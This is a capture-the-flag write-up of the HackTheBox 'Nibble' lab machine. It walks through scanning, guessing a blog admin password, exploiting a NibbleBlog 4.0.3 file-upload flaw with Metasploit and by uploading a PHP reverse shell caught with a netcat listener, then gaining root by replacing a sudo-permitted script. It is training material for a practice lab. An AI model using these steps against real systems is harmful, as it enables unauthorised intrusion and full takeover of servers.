HackTheBox Write-up Nibble

HackTheBox Write-up Nibble


This is the write-up of the Machine NIBBLE from HackTheBox

DIGEST

A nibble is an easy machine, based on nimble blog vulnerability, using Metasploit we gain the initial shell, and after exploiting SUID we gain root on the machine.

Machine Author: mrb3n
Machine Type: Linux
Machine Level: 3.7/10

machine map

Know-How

  • Nmap
  • Searchsploit
  • Metasploit

Absorb Skills

  • CVE-2015–6967

Scanning the Network

$namp -sC -sV 10.10.10.75
man nmap
nmap result

Page source of the port 80 gives us some hint about /nibbleblog directory.

view-source://10.10.10.75/
//10.10.10.75/nibbleblog/

Running Dirbuster on Port 80

Dirbuster

Admin.php looks interesting, let's try to brute-force which some common used password.

admin page

Username: admin

Password: nibbles

Setting page

Nibble blog is on 4.0.3 version lets try to find out if there is any vulnerability available.

Exploiting the Server

searchsploit nibbleblog 4.0.3
searchsploit result

Let's use Metasploit to exploit the vulnerability.

msf5 > use exploit/multi/http/nibbleblog_file_upload  
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
targeturi => nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
preparing exploit
exploiting the server

PRIVILEGED ESCALATION

Basic Linux Privilege Escalation

$ find / -perm -u=s -type f 2>/dev/null
$ sudo -l
man sudo
finding the NOPASSWD file

we can run the monitor.sh without using the password.

/home/nibbler/personal/stuff/monitor.sh

OWN ROOT

This file does not exist, however, so it is possible to create a simple bash script in its place to achieve root access.

creating the bash script
own root

Manual exploitation

NibbleBlog 4.0.3: Code Execution

STEP 1:- Find the PHP reverse shell.

I am using a Pentestmonkey reverse shell.

pentestmonkey/php-reverse-shell

STEP 2:-Upload the PHP shell as and image.

PHP-reverse-shell.php
//10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

STEP 3:-Setting up the reverse shell.

$nc -lnvp 4444
man nc

STEP 4:- Visit the image URL it will give back the reverse shell.

//10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

reverse shell

inc0gnito – Medium

Thanks for reading! If you enjoyed this story, please click the 👏 button and share it to help others! Feel free to leave a comment 💬 below. Have feedback? Let’s connect on Twitter.

Follow Infosec Write-ups for more such awesome write-ups.

InfoSec Write-ups


HackTheBox Write-up Nibble was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.




HackTheBox Write-up Nibble
InfoSec Write-ups – Medium
Source link




TAGS
Share This

COMMENTS

Wordpress (0)
Disqus ( )